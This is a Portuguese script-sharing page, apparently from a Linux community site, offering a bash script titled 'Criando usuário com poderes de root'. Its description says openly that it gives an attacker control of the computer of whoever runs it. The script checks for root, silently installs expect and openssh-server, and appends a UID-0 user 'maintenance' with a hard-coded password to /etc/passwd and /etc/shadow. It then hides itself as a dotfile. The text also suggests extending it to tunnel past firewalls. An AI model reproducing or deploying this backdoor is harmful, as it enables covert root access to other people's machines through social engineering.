Criando usuário com poderes de root

Publicado por Marcelo (última atualização em 17/10/2009)

[ Hits: 7.000 ]

Download login.super




Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.

Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.

É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!

  



Esconder código-fonte

#!/bin/bash
# verifica se o usuário está como root
if [ "`id -u`" != "0" ]; then
echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.'
read pausa
exit 0
fi

# verifica se o script de cadastro de senha existe, se não, ele mesmo o cria
# o usuário será maintenance e a senha mdpasswd
if [ "`find -name cad.main`" = "" ]; then
touch cad.main
echo "#!/usr/bin/expect" >> cad.main
echo "set timeout 30" >> cad.main
echo "spawn passwd maintenance" >> cad.main
echo "set password \"mdpasswd"\" >> cad.main
echo "expect \"Enter new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "expect \"Retype new UNIX password:"\" >> cad.main
echo "send "\""$""password\r\"" >> cad.main
echo "send \"exit"\" >> cad.main
echo "expect \"eof\"" >> cad.main
chmod +x cad.main
fi

# verifica se o programa expect está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep expect `" = "" ]; then
aptitude install expect >> /dev/null
fi

# verifica se o servidor ssh está instalado, se não estiver, ele o instala
if [ "`dpkg -l | grep openssh-server`" = "" ]; then
aptitude install openssh-server >> /dev/null
fi

# verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd
if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then
expect cad.main >> /dev/null
exit 0
fi

# se o usuário não existir, ele será criado
echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd
echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow
expect cad.main >> /dev/null

# remove o arquivo de cadastro de usuário
rm -rf cad.min

# oculta este script
mv login.super .login.super
exit 1

Scripts recomendados

Monitore vários servidores ao mesmo tempo com Apache + shellscript

Simples inventário de máquinas em Shell Script

Replicação postgresql

Pesquisa Binária usando Bash-Shell

Select tablespace


  

Comentários

Nenhum comentário foi encontrado.


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts